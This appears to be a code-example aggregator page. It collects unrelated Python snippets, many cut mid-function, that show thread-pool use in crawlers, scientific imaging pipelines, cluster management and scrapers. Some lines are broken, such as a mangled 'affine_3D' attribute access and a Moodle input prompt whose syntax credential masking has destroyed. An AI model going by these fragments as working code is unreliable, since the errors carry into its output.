        self.data_handlers = data_handlers if data_handlers else self.data_handlers
        self._stored_requests = []

        self.name = name if name else self.name
        if not self.name:
            self.name = self.__class__.__name__

        # self.logger = logging.getLogger('spider.BaseSpider')
        self.logger = logging.getLogger(self.name)

        # if

    def get_requests(self):
        """
        Use this method to navigate through requests/links

        return/yield:
            scrapping.requests.Request object

        Note: if parsing function is not specified the default one will be used
        """
        return list(map(lambda url: Request(url), self.urls))

    def parse(self, request, html):
        """
        Default parsing function

        return/yield:
            dict with parsed data
            scrapping.requests.Request object
        """
        self.logger.warning("{} for {} parse method empty! Returning None.".format(self.name, request._url))

    def start(self):
        "Starts crawling"
        self.logger.info("{} started!".format(self.name))
        # for storing the data open data handlers
        self.open_data_handlers()

        for request in self.get_requests():
            # check if they are real Request obj and have parser
            if isinstance(request, Request):
                if not request.parser:
                    request.parser = self.parse
                self._stored_requests.append(request)

        self.pool = ThreadPool(self.workers)
        # all requests are parsed paralelly
        ret_items = self.pool.map(self._handle_request, self._stored_requests)
        # print(ret_items)
        # self.logger.debug('here 1 {}'.format(ret_items))
        # wait untill all first done
        self.pool.close()
        self.pool.join()
        # unpack returned packed objects from pool
        ret_items = self._unpack_packed(ret_items)
        self._save_ret_items_data(ret_items)

        # self.logger.debug('here 2 {}'.format(ret_items))
        # if any other return Request obj handle that
        while any(ret_items):
            # clean the list, only Requests left
            ret_requests = list(filter(lambda item: isinstance(item, Request), ret_items))

            for request in ret_requests:
                if not request.parser:
                    request.parser = self.parse
            self.pool = ThreadPool(self.workers)
            # all requests are parsed paralelly
            ret_items = list(self.pool.map(self._handle_request, ret_requests))
            # unpack returned packed objects from pool
            ret_items = self._unpack_packed(ret_items)
            self._save_ret_items_data(ret_items)
            # wait untill all first done
            self.pool.close()
            self.pool.join()

        self.close_data_handlers()

    def _unpack_packed(self, i):
        "Unpacks all packed urls (lists) in given iterable object"
        for obj in i:
            if isinstance(obj, list):
                i.extend(obj)
                i.remove(obj)
        return i

    def _handle_request(self, request):
        # prepare data to parse and call the parser
        request.join()
        bs_obj = BeautifulSoup(request.text, 'lxml')
        ret = request.parser(request, bs_obj)
        # handle data returned by yield
        if isinstance(ret, types.GeneratorType):
            items = list(filter(lambda item: isinstance(item, dict) or isinstance(item, Request), ret))
            return items
        else:
            return ret if isinstance(ret, dict) or isinstance(ret, Request) else None

    def _save_ret_items_data(self, items):
        "Handle every parsed data in returned sequence"
        for item in items:
            if isinstance(item, dict):
                self.handle_data(item)

    def handle_data(self, data):
        "Gives data to data_handlers"
        self.logger.debug("DATA: {}".format(data))
        for handler in self.data_handlers:
            handler.process(data)

    def open_data_handlers(self):
        for handler in self.data_handlers:
            handler.setUp(self)
            self.logger.debug("Data handler {} set up.".format(handler.__class__.__name__))

    def close_data_handlers(self):
        for handler in self.data_handlers:
            handler.tearDown()
            self.logger.debug("{} closed.".format(handler.__class__.__name__))
コード例 #36
0
    def fetch_group_time_series(self, time_series_request_list):

        data_frame_agg = None

        time_series_calcs = TimeSeriesCalcs()

        # depends on the nature of operation as to whether we should use threading or multiprocessing library
        if Constants().time_series_factory_thread_technique is "thread":
            from multiprocessing.dummy import Pool
        else:
            # most of the time is spend waiting for Bloomberg to return, so can use threads rather than multiprocessing
            # must use the multiprocessing_on_dill library otherwise can't pickle objects correctly
            # note: currently not very stable
            from multiprocessing_on_dill import Pool

        thread_no = Constants().time_series_factory_thread_no['other']

        if time_series_request_list[0].data_source in Constants(
        ).time_series_factory_thread_no:
            thread_no = Constants().time_series_factory_thread_no[
                time_series_request_list[0].data_source]

        pool = Pool(thread_no)

        # open the market data downloads in their own threads and return the results
        result = pool.map_async(self.fetch_single_time_series,
                                time_series_request_list)
        data_frame_group = result.get()

        pool.close()
        pool.join()

        # data_frame_group = results.get()
        # data_frame_group = results
        # data_frame_group = None

        # import multiprocessing as multiprocessing
        # close the pool and wait for the work to finish

        # processes = []

        # for x in range(0, len(time_series_request_list)):
        #    time_series_request = time_series_request_list[x]
        # processes =   [multiprocessing.Process(target = self.fetch_single_time_series,
        #                                           args = (x)) for x in time_series_request_list]

        # pool.apply_async(tsf.harvest_category, args = (category_desc, environment, freq,
        #             exclude_freq_cat, force_new_download_freq_cat, include_freq_cat))

        # Run processes
        # for p in processes: p.start()

        # Exit the completed processes
        # for p in processes: p.join()

        # collect together all the time series
        if data_frame_group is not None:
            data_frame_group = [i for i in data_frame_group if i is not None]

            if data_frame_group is not None:
                data_frame_agg = time_series_calcs.pandas_outer_join(
                    data_frame_group)

            # for data_frame_single in data_frame_group:
            #     # if you call for returning multiple tickers, be careful with memory considerations!
            #     if data_frame_single is not None:
            #         if data_frame_agg is not None:
            #             data_frame_agg = data_frame_agg.join(data_frame_single, how='outer')
            #         else:
            #             data_frame_agg = data_frame_single

        return data_frame_agg
コード例 #37
0
ファイル: stegosim.py プロジェクト: redpack-kr/aletheia
def embed_message(embed_fn, path, payload, output_dir, 
                  embed_fn_saving=False):

    path=utils.absolute_path(path)

    if not os.path.exists(output_dir):
        os.makedirs(output_dir)

    output_dir=utils.absolute_path(output_dir)

    # Read filenames
    files=[]
    if os.path.isdir(path):
        for dirpath,_,filenames in os.walk(path):
            for f in filenames:
                path=os.path.abspath(os.path.join(dirpath, f))
                if not utils.is_valid_image(path):
                    print("Warning, please provide a valid image: ", f)
                else:
                    files.append(path)
    else:
        files=[path]
    
    # remove fileas already generated in a previous execution
    filtered_files = []
    for f in files:
        basename=os.path.basename(f)
        dst_path=os.path.join(output_dir, basename)
        if os.path.exists(dst_path):
            print("Warning! file already exists, ignored:", dst_path)
            continue
        filtered_files.append(f)
    files = filtered_files
    del filtered_files

    def embed(path):
        basename=os.path.basename(path)
        dst_path=os.path.join(output_dir, basename)

        if embed_fn_saving:
            embed_fn(path, payload, dst_path)
        else:
            X=embed_fn(path, payload)
            try:
                scipy.misc.toimage(X, cmin=0, cmax=255).save(dst_path)
            except Exception as e:
                print(str(e))

    # Process thread pool in batches
    batch=1000
    for i in range(0, len(files), batch):
        files_batch = files[i:i+batch]
        n_core=cpu_count()
        print("Using", n_core, "threads")
        pool = ThreadPool(n_core)
        results = pool.map(embed, files_batch)
        pool.close()
        pool.terminate()
        pool.join()

    """
コード例 #38
0
ファイル: render_batch.py プロジェクト: rsau/grow
class RenderLocaleBatch(object):
    """Handles the rendering and threading of the controllers."""

    BATCH_DEFAULT_SIZE = 300  # Default number of documents in a batch.

    def __init__(self, jinja_env, profile, tick=None, batch_size=None):
        self.batch_size = batch_size or self.BATCH_DEFAULT_SIZE
        self.jinja_env = jinja_env
        self.profile = profile
        self.tick = tick
        self.batches = [[]]
        self._is_rendering = False
        self._results = None
        self._thread_pool = None

    def __len__(self):
        count = 0
        for batch in self.batches:
            count = count + len(batch)
        return count

    def _get_batch(self):
        # Ensure that batch is not over the max size.
        batch = self.batches[len(self.batches) - 1]
        if len(batch) >= self.batch_size:
            self.batches.append([])
            batch = self.batches[len(self.batches) - 1]
        return batch

    def add(self, controller, *args, **kwargs):
        """Add an item to be rendered to the batch."""
        batch = self._get_batch()

        batch.append({
            'controller': controller,
            'jinja_env': self.jinja_env,
            'args': args,
            'kwargs': kwargs,
        })

    def render_start(self):
        """Start the batches rendering."""
        self._thread_pool = ThreadPool(len(self.batches))
        self._results = self._thread_pool.imap_unordered(
            render_func, self.batches)
        self._is_rendering = True

    def render_finish(self):
        """Finish in progress batches rendering."""
        if not self._is_rendering:
            raise RenderNotStartedError('Rendering was never started')

        render_errors = []
        rendered_docs = []

        for batch_result in self._results:
            render_errors = render_errors + batch_result.render_errors
            rendered_docs = rendered_docs + batch_result.rendered_docs
            if self.tick:
                for _ in batch_result.render_errors:
                    self.tick()
                for _ in batch_result.rendered_docs:
                    self.tick()
            for result in batch_result.rendered_docs:
                self.profile.add_timer(result.render_timer)

        self._thread_pool.close()
        self._thread_pool.join()
        self._is_rendering = False

        return rendered_docs, render_errors

    def render_sync(self):
        """Syncronous rendering for non-threaded rendering."""
        render_errors = []
        rendered_docs = []

        for batch in self.batches:
            batch_result = render_func(batch, tick=self.tick)
            render_errors = render_errors + batch_result.render_errors
            rendered_docs = rendered_docs + batch_result.rendered_docs

        return rendered_docs, render_errors
コード例 #39
0
def get_news_feed(tags_for_feed, blocked_news):

    high_tier = []
    low_tier = []

    feedsize = 9
    tags_for_feed = list(tags_for_feed.items())
    random.shuffle(tags_for_feed)
    tags_for_feed = tags_for_feed[:feedsize]
    mean = sum(x[1] for x in tags_for_feed) / len(tags_for_feed)
    if len(tags_for_feed) >= feedsize:
        for item in tags_for_feed:
            if item[1] > mean:
                high_tier.append(item)
            else:
                low_tier.append(item)
    elif len(tags_for_feed) > 0:
        while len(high_tier) < feedsize:
            high_tier.append(tags_for_feed[random.randint(
                0,
                len(tags_for_feed) - 1)])
    else:
        return

    random.shuffle(low_tier)
    random.shuffle(high_tier)

    tags_for_feed = high_tier + low_tier
    start = time.time()
    pool1 = ThreadPool(len(tags_for_feed))

    urls = pool1.map(GetResponses, tags_for_feed)
    pool1.close()
    pool1.join()

    #forming len
    end = time.time()
    print("get urls from rss", end - start)
    urls_to_parse = []

    start = time.time()

    for i in range(len(urls)):
        res = [i for i in urls[i] if i not in blocked_news]
        if len(res) > 0:
            data = dict()
            data['tag'] = (tags_for_feed[i])[0]
            data['coef'] = (tags_for_feed[i])[1]
            data['url'] = res[0]
            blocked_news.append(res[0])
            urls_to_parse.append(data)

    end = time.time()
    print("form non repeating dict", end - start)

    start = time.time()
    pool2 = ThreadPool(feedsize)

    results = pool2.map(GetTxt, urls_to_parse)

    pool2.close()
    pool2.join()

    end = time.time()

    print("parsing news", end - start)
    SortNewsByInterest(results)
    results = FormUserFeed(results)

    return results
コード例 #40
0
 def initiate_threads():
     _pool = Pool(5)
     _pool.map(traverse_directory, self.valid_directories)
     _pool.close()
     _pool.join()
コード例 #41
0
ファイル: main.py プロジェクト: leymajr/img_agumentor
            if not op:
                print('Unknown operation {}'.format(op_code))
                sys.exit(3)
        op_lists.append(op_list)

    counter = Counter()
    thread_pool = Pool(WORKER_COUNT)
    print('Thread pool initialised with {} worker{}'.format(
        WORKER_COUNT, '' if WORKER_COUNT == 1 else 's'))

    matches = []
    for dir_info in os.walk(image_dir):
        dir_name, _, file_names = dir_info
        print('Processing {}...'.format(dir_name))

        for file_name in file_names:
            if EXTENSION_REGEX.match(file_name):
                if AUGMENTED_FILE_REGEX.match(file_name):
                    counter.skipped_augmented()
                else:
                    process(dir_name, file_name, op_lists)
            else:
                counter.skipped_no_match()

    print("Waiting for workers to complete...")
    thread_pool.close()
    thread_pool.join()

    print(counter.get())
コード例 #42
0
class Engine(object):
    def __init__(self):
        if settings.IS_DISTRIBUTE:
            self.collector = RedisStatsCollector()
        else:
            self.collector = NormalStatsCollector()
        self.scheduler = Scheduler(self.collector)

        # 实例化四个对象
        self.spiders = self._auto_import_instances(settings.SPIDERS,
                                                   isspider=True)
        # self.scheduler = Scheduler()
        self.downloader = Downloader()
        self.pipelines = self._auto_import_instances(settings.PIPELINES)

        # 实例化中间件
        self.spider_mids = self._auto_import_instances(
            settings.SPIDERS_MIDDLEWARES)
        self.down_mids = self._auto_import_instances(
            settings.DOWNLOADER_MIDDLEWARES)

        # # 记录请求个数和响应个数
        # self.total_request_num = 0
        # self.total_response_num = 0

        # 创建线程池
        self.pool = Pool()
        # 允许递归
        self.is_running = True

    # 动态导包多方法
    def _auto_import_instances(self, path=[], isspider=False):
        '''通过配置文件,动态导入类并实例化
        path: 表示配置文件中配置的导入类的路径
        isspider: 由于爬虫需要返回的是一个字典,因此对其做对应的判断和处理
        '''
        instances = {} if isspider else []
        for p in path:
            module_name = p.rsplit(".", 1)[0]  # 取出模块名称
            cls_name = p.rsplit(".", 1)[1]  # 取出类名称
            ret = importlib.import_module(module_name)  # 动态导入爬虫模块
            cls = getattr(ret, cls_name)  # 根据类名称获取类对象

            if isspider:
                instances[cls.name] = cls()  # 组装成爬虫字典{spider_name:spider(),}
            else:
                instances.append(cls())  # 实例化类对象
                # 把管道中间件分别组装成 管道列表=[管道类1(),管道类2()] / 中间件列表 = [中间件类1(),中间件类2()]
        return instances  # 返回类对象字典或列表

    # 初始化请求对象:入队列
    def _start_requests(self):
        # 1、spider---request--->engine
        def _func(spider_name, spider):
            requests = spider.start_requests()

            for request in requests:
                # 爬虫中间件---request
                for spider_mid in self.spider_mids:
                    request = spider_mid.process_request(request)

                # 给对应的请求对象request绑定自己的爬虫key(可以动态绑定,即为如下)
                request.spider_name = spider_name

                # 2、engine---request--->scheduler
                self.scheduler.add_request(request)
                # 记录请求对象个数
                # self.total_request_num += 1
                self.collector.incr(self.collector.request_nums_key)

        for spider_name, spider in self.spiders.items():
            # 让每一个爬虫都异步执行初始化请求对象:入队列
            self.pool.apply_async(_func, args={spider_name, spider})

    # 出队列:下载数据
    def execute_request_response_item(self):
        # 3、scheduler---request--->engine
        request = self.scheduler.get_request()
        # 1、判断对象是否为空。2、跳出死循环
        if request is None:
            return

        # 下载中间件---resuqest
        for down_mid in self.down_mids:
            request = down_mid.process_request(request)
        # 4、engine---request--->downloader
        # 5、downloader---response--->engine
        response = self.downloader.get_response(request)

        # 将request的meta传递给response中的meta
        response.meta = request.meta

        # 下载中间件---response
        for down_mid in self.down_mids:
            response = down_mid.process_response(response)

        # 爬虫中间件---response
        for spider_mid in self.spider_mids:
            response = spider_mid.process_response(response)
        # 6、engine---response--->spider

        # 使用字典之后,只需要对应解析爬虫名称就能对应解析方法
        # 所以之后的爬虫方法不再需要遍历
        spider = self.spiders[request.spider_name]

        # 根据当前爬虫自己的请求对象,生成对应的解析方法,并引用于之后的解析
        # for spider in self.spiders:
        parse = getattr(spider, request.parse)
        results = parse(response)

        for result in results:
            # 7、result---engine判断
            if isinstance(result, Request):
                # 对于新的请求对象也要绑定key
                result.spider_name = request.spider_name

                # 如果是request:engine---request--->scheduler
                # 如果是新请求,需要重新进入爬虫中间件
                for spider_mid in self.spider_mids:
                    result = spider_mid.process_request(result)
                self.scheduler.add_request(result)

                # 注意点:新的请求对象记录个数
                # 因为新的请求对象已经进入了队列,而引擎却没有进行加一的计数
                # self.total_request_num += 1
                self.collector.incr(self.collector.request_nums_key)
            else:
                # 如果是item:engine---item--->pipeline
                for pipeline in self.pipelines:
                    pipeline.process_item(result, spider)

        # 记录响应对象个数
        # self.total_response_num += 1
        self.collector.incr(self.collector.response_nums_key)

    # 构建进程池中的回调函数:递归
    def _callback(self, item):
        if self.is_running:
            self.pool.apply_async(self.execute_request_response_item,
                                  callback=self._callback,
                                  error_callback=self._error_back)

    # 捕获子线程异常
    def _error_back(self, e):
        # print(e)
        logger.exception(e)
        raise e

    def _start(self):
        '''调度4个模块'''
        # 加入线程池
        self.pool.apply_async(self._start_requests,
                              error_callback=self._error_back)

        # 应该手动设置最大并发数
        for i in range(5):
            # 此中的异步方法中,传入的target是一个函数名称而不是一个方法,所以不能在后面加括号
            self.pool.apply_async(self.execute_request_response_item,
                                  callback=self._callback,
                                  error_callback=self._error_back)

        # 判断多爬虫中,没有增量式的条件
        sum_task = sum([spider.time_task for spider in self.spiders.values()])

        while True:
            time.sleep(0.001)
            # self.pool.apply_async(self.execute_request_response_item())
            # 只有当值为0,即为没有增量式才会退出
            if sum_task == 0:
                # 由于异步的问题,所以需要加入条件阻塞
                if self.collector.request_nums != 0:
                    # 判断退出条件,爬虫结束
                    if self.collector.response_nums + self.collector.repeat_request_nums >= self.collector.request_nums:
                        self.is_running = False
                        break

        self.pool.close()
        self.pool.join()

    # 将上面的调度方法变成私有方法,进行嵌套,方便日志记录时间
    def start(self):
        start_time = datetime.now()
        self._start()
        end_time = datetime.now()

        logger.info('this is a distribute spider:{}'.format(
            settings.IS_DISTRIBUTE))
        logger.info('the self_async is {}'.format(settings.ASYNC_TYPE))
        logger.info('the spider start at {}'.format(start_time))
        logger.info('the spider end in {}'.format(end_time))
        logger.info("the request's total is {}".format(
            self.collector.request_nums))
        logger.info("the repetitive request's total is {}".format(
            self.collector.repeat_request_nums))
        logger.info("the response's total is {}".format(
            self.collector.response_nums))
        logger.info('the spider pass with {}'.format(
            (end_time - start_time).total_seconds()))

        # 清空redis中记录的个数
        self.collector.clear()
コード例 #43
0
    g.create_dataset('label_classification', data=classi,dtype=np.uint8)
    g.close()

    return data

data=[]

csv_data = [line.rstrip('\r\n') for line in open('training.csv')]
csv_data = csv_data[1:]

h5_size = 30000
for c,i in enumerate(range(7, 8)): #int(len(csv_data)/h5_size))):
    print(i)
    m = ThreadPool(12)
    data = m.map(load_image_thread, csv_data[(i*h5_size)+1:(i+1)*h5_size+1])
    m.close()

    images = [x[0] for x in data]
    reg = [x[1] for x in data]
    classi = [x[2] for x in data]

    g = h5py.File("h5/training"+str(i+1)+".hdf5", "w")
    g.create_dataset('data', data=images,dtype=np.float32)
    g.create_dataset('label_regression', data=reg,dtype=np.float32)
    g.create_dataset('label_classification', data=classi,dtype=np.uint8)
    g.close()

'''
reste=len(csv_data)-int(len(csv_data)/h5_size)*h5_size

m = ThreadPool(12)
コード例 #44
0
            thread.start()
            for thread in threads:
                thread.join()

    except Exception, e:
        print 'error', str(e)


if __name__ == '__main__':

    # 填写参数:用户名密码 俱乐部ID 和 俱乐部主域名 共多少页(这个选填)
    username = '******'
    password = '******'
    clubid = '1166'
    host = 'shlunyu'
    totalPage = 36

    opener = login("http://passport.tiyushe.com/?rc=SSO&ra=login&ajax=1",
                   username, password)
    url = 'http://' + host + '.tiyushe.com/?c=clubmanage&a=member&cid=' + clubid + '&page={0}'
    childUrl = 'http://' + host + '.tiyushe.com/?c=clubmanage&a=add_member&cid={0}&uid={1}'
    filename = 'getData.csv'
    page_pool = ThreadPool(totalPage / 2)
    page_list = []
    for i in range(1, totalPage + 1):
        u = url.format(i)
        page_list.append(u)
    page_pool.map_async(get_list, (page_list))
    page_pool.close()
    page_pool.join()
コード例 #45
0
ファイル: hist_pipeline_gray.py プロジェクト: jungbt/NMB
 def colorize(self, col_out_dir, final_out_dir):
     """
     Transforms the individual channels from Pipeline.color_split using the 
     affine/nonlinear transformation parameters from Pipeline.slice_by_slice_alignment() 
     and the nonlinear volumetric transformation parameters from Pipeline.blockface_to_MRI_alignment()
     Because each transformation is independent of the others, the script will utilize all
     threads provided by the user to transform multiple slices simultaneously.
     See Transform_Wrapper for more information and the transformation code.
     """
     #Feed transformation information to sub-processes through Transform_Wrapper
     out_suf_list = ['Blue', 'Green', 'Red']
     skip_flag = False
     for i, col_vol in enumerate([
             self.hist_NIFTI.Blue_vol, self.hist_NIFTI.Green_vol,
             self.hist_NIFTI.Red_vol
     ]):
         for j in range(len(self.hist_NIFTI.slices)):
             if not os.path.isfile(self.orig_slice_by_slice_loc +
                                   '/color/' + out_suf_list[i] + '/' +
                                   col_vol.slices[j].name):
                 break
         else:
             continue
         break
     else:
         print(
             ' - All Color Channel Split Transformed Files Exist. Utilizing currently existing data.'
         )
         skip_flag = True
     if skip_flag == False:
         print(
             '====================================ATTEMPTING TO MULTITHREAD===================================='
         )
         pool = Pool(processes=self.threads)
         self.hist_NIFTI.Blue_vol.col = 'Blue'
         self.hist_NIFTI.Green_vol.col = 'Green'
         self.hist_NIFTI.Red_vol.col = 'Red'
         for col_vol in enumerate([
                 self.hist_NIFTI.Blue_vol, self.hist_NIFTI.Green_vol,
                 self.hist_NIFTI.Red_vol
         ]):
             pool.map(
                 Transform_Wrapper(
                     col_vol, self.hist_transform, self.BF_NIFTI,
                     self.orig_slice_by_slice_loc + '/color/'),
                 list(range(len(self.hist_transform.slices))))
             pool.close()
             pool.join()
     #Load output color channel split Stacks and convert to volume/
     tmp = self.BF_NIFTI
     r = Stacks.NIFTI_Stack(self.orig_slice_by_slice_loc + '/color/Red/')
     r.affine_3D = tmp.affine_3D
     r.volumize(self.orig_slice_by_slice_loc +
                '/color/volumes/r_vol.nii.gz')
     g = Stacks.NIFTI_Stack(self.orig_slice_by_slice_loc + '/color/Green/')
     g.affine_3D = tmp.affine_3Dblockface_to_MRI_alignment.nii.gz
     g.volumize(self.orig_slice_by_slice_loc +
                '/color/volumes/g_vol.nii.gz')
     b = Stacks.NIFTI_Stack(self.orig_slice_by_slice_loc + '/color/Blue/')
     b.affine_3D = tmp.affine_3D
     b.volumize(self.orig_slice_by_slice_loc +
                '/color/volumes/b_vol.nii.gz')
     #Transform color-split volumes to the MRI space
     self.final_apply_transform(
         self.orig_slice_by_slice_loc + '/color/volumes/b_vol.nii.gz',
         self.orig_slice_by_slice_loc + '/color/volumes/final_b_vol.nii.gz')
     self.final_apply_transform(
         self.orig_slice_by_slice_loc + '/color/volumes/g_vol.nii.gz',
         self.orig_slice_by_slice_loc + '/color/volumes/final_g_vol.nii.gz')
     self.final_apply_transform(
         self.orig_slice_by_slice_loc + '/color/volumes/r_vol.nii.gz',
         self.orig_slice_by_slice_loc + '/color/volumes/final_r_vol.nii.gz')
     #Load transformed and color-split volumes. Merge the channels to create and RGB volume.
     print('Loading RGB')
     r_data = nib.load(self.orig_slice_by_slice_loc +
                       '/color/volumes/final_r_vol.nii.gz').get_data()
     g_data = nib.load(self.orig_slice_by_slice_loc +
                       '/color/volumes/final_g_vol.nii.gz').get_data()
     b_data = nib.load(self.orig_slice_by_slice_loc +
                       '/color/volumes/final_b_vol.nii.gz').get_data()
     print('Merging Channels')
     rgb = np.empty((r_data.shape[0], r_data.shape[1], r_data.shape[2], 3))
     rgb[:, :, :, 0] = b_data
     rgb[:, :, :, 1] = g_data
     rgb[:, :, :, 2] = r_data
     rgb = rgb.astype('u1')
     #Save the RGB Volume
     print('Saving Volume')
     shape_3d = rgb.shape[0:3]
     rgb_dtype = np.dtype([('R', 'u1'), ('G', 'u1'), ('B', 'u1')])
     rgb_typed = rgb.view(rgb_dtype).reshape(shape_3d)
     tmp = nib.load(self.MRI)
     volume = nib.Nifti1Image(rgb_typed, affine=tmp.affine)
     nib.save(volume, final_out_dir + '/RGB_aligned_histology_vol.nii.gz')
コード例 #46
0
ファイル: Main.py プロジェクト: OinkHeinz/MoodleDownloader
def main():

	# configure the program to use utf8 encoding
	reload(sys)
	sys.setdefaultencoding('utf8')

	print "#### Welcome to the MoodleDownloader!\n"
	sUsername = raw_input("Enter you username: "******"\n\n"
コード例 #47
0
    def start(self):
        """
        Starts the cluster with the properties given in the
        constructor. It will create the nodes through the configurator
        and delegate all the work to them. After the identifiers of
        all instances are available, it will save the cluster through
        the cluster storage.
        """

        # To not mess up the cluster management we start the nodes in a
        # different thread. In this case the main thread receives the sigint
        # and communicates to the `start_node` thread. The nodes to work on
        # are passed in a managed queue.
        self.keep_running = True

        def sigint_handler(signal, frame):
            """
            Makes sure the cluster is stored, before the sigint results in
            exiting during the node startup.
            """
            log.error("user interruption: saving cluster before exit.")
            self.keep_running = False

        nodes = self.get_all_nodes()
        thread_pool = Pool(processes=len(nodes))
        log.debug("Created pool of %d threads" % len(nodes))
        signal.signal(signal.SIGINT, sigint_handler)

        # This is blocking
        result = thread_pool.map_async(self._start_node, nodes)

        while not result.ready():
            result.wait(1)
            if not self.keep_running:
                # the user did abort the start of the cluster. We finish the
                #  current start of a node and save the status to the
                # storage, so we don't have not managed instances laying
                # around
                log.error("Aborting upon Ctrl-C")
                thread_pool.close()
                thread_pool.join()
                self._storage.dump_cluster(self)
                sys.exit(1)

        # dump the cluster here, so we don't loose any knowledge
        self._storage.dump_cluster(self)

        signal.alarm(0)

        def sigint_reset(signal, frame):
            sys.exit(1)

        signal.signal(signal.SIGINT, sigint_reset)

        # check if all nodes are running, stop all nodes if the
        # timeout is reached
        def timeout_handler(signum, frame):
            raise TimeoutError(
                "problems occured while starting the nodes, "
                "timeout `%i`", Cluster.startup_timeout)

        signal.signal(signal.SIGALRM, timeout_handler)
        signal.alarm(Cluster.startup_timeout)

        starting_nodes = self.get_all_nodes()
        try:
            while starting_nodes:
                starting_nodes = [
                    n for n in starting_nodes if not n.is_alive()
                ]
                if starting_nodes:
                    time.sleep(10)
        except TimeoutError as timeout:
            log.error("Not all nodes were started correctly within the given"
                      " timeout `%s`" % Cluster.startup_timeout)
            for node in starting_nodes:
                log.error("Stopping node `%s`, since it could not start "
                          "within the given timeout" % node.name)
                node.stop()
                self.remove_node(node)

        signal.alarm(0)

        # If we reached this point, we should have IP addresses for
        # the nodes, so update the storage file again.
        self._storage.dump_cluster(self)

        # Try to connect to each node. Run the setup action only when
        # we successfully connect to all of them.
        signal.signal(signal.SIGALRM, timeout_handler)
        signal.alarm(Cluster.startup_timeout)
        pending_nodes = self.get_all_nodes()[:]

        try:
            while pending_nodes:
                for node in pending_nodes[:]:
                    if node.connect():
                        log.info("Connection to node %s (%s) successful.",
                                 node.name, node.ip_public)
                        pending_nodes.remove(node)
                if pending_nodes:
                    time.sleep(5)

        except TimeoutError:
            # remove the pending nodes from the cluster
            log.error("Could not connect to all the nodes of the "
                      "cluster within the given timeout `%s`." %
                      Cluster.startup_timeout)
            for node in pending_nodes:
                log.error("Stopping node `%s`, since we could not connect to"
                          " it within the timeout." % node.name)
                node.stop()
                self.remove_node(node)

        signal.alarm(0)

        # A lot of things could go wrong when starting the cluster. To
        # ensure a stable cluster fitting the needs of the user in terms of
        # cluster size, we check the minimum nodes within the node groups to
        # match the current setup.
        self._check_cluster_size()
コード例 #48
0
ファイル: hist_pipeline_gray.py プロジェクト: jungbt/NMB
    def start_pipeline(self):
        """
        Defines the steps and order of the pipeline. Only call from Pipeline.run()
        to avoid errors.
        """
        mark = '================================='
        print(mark, '\nSTEP 0: GENERATING OUTPUT DIRECTORIES\n', mark)
        self.gen_directory_struct()
        print(mark, 'STEP 1:PREPROCESSING', mark)
        self.orig_MRI = self.MRI
        self.preprocess_histology()
        self.preprocess_blockface()
        self.preprocess_MRI()
        print(mark, '\nSTEP 2:RESAMPLING (OPTIONAL)\n', mark)
        #Resample data
        if self.resolution_level is not 'MRI':
            self.MRI_path += 'resampled_'
        if self.resolution_level == 'histology':
            skip_flag = False
            #Match the resolution of histology
            if self.overwrite == False and os.path.isfile(
                    self.MRI_path + os.path.split(self.orig_MRI)[1]):
                print(
                    ' - {} Already Exists. Utilizing currently existing data.'.
                    format(self.MRI_path + os.path.split(self.orig_MRI)[1]))
                self.MRI = self.MRI_path + os.path.split(self.orig_MRI)[1]
            else:
                self.resample(self.MRI,
                              self.MRI_path + os.path.split(self.orig_MRI)[1],
                              self.histology.pix_dim, self.histology.affine_3D,
                              3)
                self.MRI = self.MRI_path + os.path.split(self.orig_MRI)[1]
            if self.overwrite == False:
                for slice in self.BF_NIFTI.slices:
                    if not os.path.isfile(
                            self.orig_bf_loc +
                            "/NIFTI/resampled/{}".format(slice.name)):
                        break
                else:
                    print(
                        ' - All Resampled Blockface NIFTI Files Exist. Utilizing currently existing data.'
                    )
                    self.BF_NIFTI.rename(self.orig_bf_loc +
                                         "/NIFTI/resampled/")
                    self.BF_NIFTI.affine_3D = self.hist_NIFTI.affine_3D
                    skip_flag = True
            if skip_flag == False:
                for slice in self.BF_NIFTI.slices:
                    self.resample(
                        slice.path, self.orig_bf_loc +
                        "/NIFTI/resampled/{}".format(slice.name),
                        self.histology.pix_dim, self.histology.affine_3D, 2)
                self.BF_NIFTI.rename(self.orig_bf_loc + "/NIFTI/resampled/")
                self.BF_NIFTI.affine_3D = self.hist_NIFTI.affine_3D
        elif self.resolution_level == 'blockface':
            #Match the resolution of ng
            if self.overwrite == False and os.path.isfile(
                    self.MRI_path + os.path.split(self.orig_MRI)[1]):
                print(
                    ' - {} Already Exists. Utilizing currently existing data.'.
                    format(self.MRI_path + os.path.split(self.orig_MRI)[1]))
            else:
                self.resample(self.MRI,
                              self.MRI_path + os.path.split(self.orig_MRI)[1],
                              self.bf.pix_dim, self.histology.affine_3D, 3)
                self.MRI = self.MRI_path + os.path.split(self.orig_MRI)[1]
        print(mark, '\nSTEP 3:ALIGNMENT\n', mark)
        self.slice_by_slice_alignment(self.threads,
                                      self.orig_slice_by_slice_loc)
        self.blockface_to_MRI_alignment(self.orig_bf_loc +
                                        "/volume/aligned_to_MRI")
        self.orig_hist_NIFTI.col = 'gray'
        pool = Pool(processes=self.threads)
        pool.map(
            Transform_Wrapper(self.orig_hist_NIFTI, self.hist_transform,
                              self.BF_NIFTI, self.orig_slice_by_slice_loc),
            list(range(len(self.hist_transform.slices))))
        pool.close()
        pool.join()
        hist_vol = Stacks.NIFTI_Stack(self.orig_slice_by_slice_loc + '/gray',
                                      '*.nii.gz', self.hist_NIFTI.affine_3D)
        hist_vol.volumize(self.final_out + '/hist_to_bf.nii.gz')
        self.final_apply_transform(self.final_out + '/hist_to_bf.nii.gz',
                                   self.final_out + '/hist_to_MRI.nii.gz')
        if self.color == True:
            print(mark, '\nSTEP 4:COLORIZATION\n', mark)
            self.colorize(self.orig_col_split_loc, self.final_out)

        print('Done!')
コード例 #49
0
ファイル: crawler.py プロジェクト: 10elements/crawler
def parallelCrawling(url):
	threadPool = Pool(12)
	threadPool.map(download, nextURL(url))
	threadPool.close()
	threadPool.join()
コード例 #50
0
ファイル: products.py プロジェクト: shichaoji/recur7down
def product_main():
    
    try:
        sys.path.append(os.getcwd())
        from info import link, cat, large, small
        print 'imported data from info'
        sys.path.remove(os.getcwd())

    except:
        print 'lack of info.py'
        exit(0)
        
        
    #path = raw_input('the PATH of file contains a single string of the url link: ')
    #with open(path) as fh:
    #    link = fh.read()
    cpu = int(raw_input('(multi-processing) how many process to run ? '))


    #cat = [10020, 10021, 10010, 10001, 10003, 10006, 10019, 10008, 10009, 10011, 10013, \
    #      10023, 10022, 10015, 10012, 10007, 10017, 10018]

    #large = [19, 1, 17, 9, 10, 11, 23, 18, 15, 16, 12, 22, 13, 6]
